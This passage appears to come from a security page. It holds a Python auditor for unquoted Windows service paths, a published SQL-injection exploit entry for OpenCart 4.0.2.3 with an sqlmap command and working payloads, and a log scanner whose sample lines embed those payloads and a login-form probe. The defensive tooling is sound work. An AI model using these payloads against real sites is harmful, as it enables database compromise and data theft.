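# quoted path printed in the Nexpose entry above.
UNQUOTED_SAMPLE = r"""
SERVICE_NAME: examplesvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files\Example Vendor\bin\svc.exe -run
        SERVICE_START_NAME : LocalSystem
"""

QUOTED_SAMPLE = r"""
SERVICE_NAME: nexposeconsole
        BINARY_PATH_NAME   : "C:\Program Files\rapid7\nexpose\nsc\bin\nexlaunch.exe"
        SERVICE_START_NAME : LocalSystem
"""

FIELD_RE = re.compile(r"^\s*([A-Z_]+)\s*:\s*(.*)$")

def parse_sc_qc(text):
    """Collect the `NAME : value` fields of `sc qc` output into a dict."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields

def audit_service_path(sc_output):
    """Flag an unquoted BINARY_PATH_NAME containing spaces and list the
    directories whose write ACLs must exclude unprivileged users: Windows
    tries each space-delimited prefix of an unquoted path as an executable."""
    fields = parse_sc_qc(sc_output)
    path = fields.get("BINARY_PATH_NAME", "")
    result = {"service": fields.get("SERVICE_NAME", ""),
              "account": fields.get("SERVICE_START_NAME", ""),
              "unquoted": False, "audit_dirs": []}
    if not path or path.startswith('"'):
        return result                      # quoted: resolved unambiguously
    low = path.lower()
    exe = path[: low.find(".exe") + 4] if ".exe" in low else path  # drop args
    if " " not in exe:
        return result                      # no spaces: nothing to misparse
    parts = exe.split(" ")
    dirs = set()
    for i in range(1, len(parts)):         # each prefix that ends before a space
        parent = " ".join(parts[:i]).rsplit("\\", 1)[0]
        dirs.add(parent + "\\" if parent.endswith(":") else parent)
    result["unquoted"] = True
    result["audit_dirs"] = sorted(dirs, key=len)
    return result
```

Run against real hosts, feed it the output of `sc qc <service>` for every service that starts as LocalSystem and fix any flagged entry by quoting the path and tightening the listed directories' ACLs.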
-
OpenCart Core 4.0.2.3 - 'search' SQLi
# Exploit Title: OpenCart Core 4.0.2.3 - 'search' SQLi
# Date: 2024-04-2
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://github.com/opencart/opencart/releases
# Version: 4.0.2.3
# Tested on: XAMPP, Linux
# Contact: https://twitter.com/dmaral3noz

* Description :

Opencart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

* Steps to Reproduce :

- Go to : http://127.0.0.1/index.php?route=product/search&search=test
- Now use the Sqlmap command:

sqlmap -u "http://127.0.0.1/index.php?route=product/search&search=#1" --level=5 --risk=3 -p search --dbs

===========

Output :

Parameter: search (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: route=product/search&search=') AND 2427=2427-- drCa

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: route=product/search&search=') AND (SELECT 8368 FROM (SELECT(SLEEP(5)))uUDJ)-- Nabb
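An added detection example (not from the OpenCart entry or the login-form script above) that covers both: it URL-decodes request parameters from access-log lines and flags the boolean-tautology, time-based and UNION patterns those two entries use. The log lines are constructed, and the POST body is assumed to be logged as a trailing quoted field, which stock web-server logs do not do by default.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not from the page's tooling). Lines 2-3 carry
# the sqlmap payloads from the OpenCart entry, line 4 a login-form probe like
# the one the script above builds; the POST body is assumed to be logged as a
# trailing quoted field.
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Apr/2024:10:00:01 +0000] "GET /index.php?route=product/search&search=test HTTP/1.1" 200 5120',
    '10.0.0.5 - - [02/Apr/2024:10:00:02 +0000] "GET /index.php?route=product/search&search=%27%29%20AND%202427%3D2427--%20drCa HTTP/1.1" 200 5120',
    '10.0.0.5 - - [02/Apr/2024:10:00:09 +0000] "GET /index.php?route=product/search&search=%27%29%20AND%20%28SELECT%208368%20FROM%20%28SELECT%28SLEEP%285%29%29%29uUDJ%29--%20Nabb HTTP/1.1" 200 5120',
    '10.0.0.7 - - [02/Apr/2024:10:01:00 +0000] "POST /hotel%20booking/admin/login.php HTTP/1.1" 200 300 "password=admin%27%20UNION%20SELECT%20IF%28SUBSTRING%28upass%2C1%2C1%29%3D%27a%27%2Csleep%283%29%2Cnull%29%20FROM%20manager"',
]

REQUEST_RE = re.compile(r'"(\w+) (\S+) HTTP/[\d.]+" \d+ \d+(?: "([^"]*)")?')

# Each signature names one injection technique seen in the entries above.
SIGNATURES = {
    "time_based": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(", re.I),
    "boolean_tautology": re.compile(r"\b(and|or)\s+(\d+)\s*=\s*\2\b", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "comment_terminator": re.compile(r"--\s|/\*"),
}

def scan_log(lines):
    """Return one finding per (line, parameter) whose decoded value matches."""
    findings = []
    for number, line in enumerate(lines, start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        _method, target, body = m.groups()
        params = parse_qs(urlsplit(target).query)      # decoded GET params
        if body:
            params.update(parse_qs(body))              # decoded POST params
        for name, values in params.items():
            for value in values:
                hits = sorted(k for k, rx in SIGNATURES.items() if rx.search(value))
                if hits:
                    findings.append({"line": number, "param": name, "hits": hits})
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Matching on decoded values matters because the payloads arrive percent-encoded, so a raw-line grep for `SLEEP(` or `UNION SELECT` misses them; pair the time-based signature with response-time outliers to catch variants that avoid these keywords.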
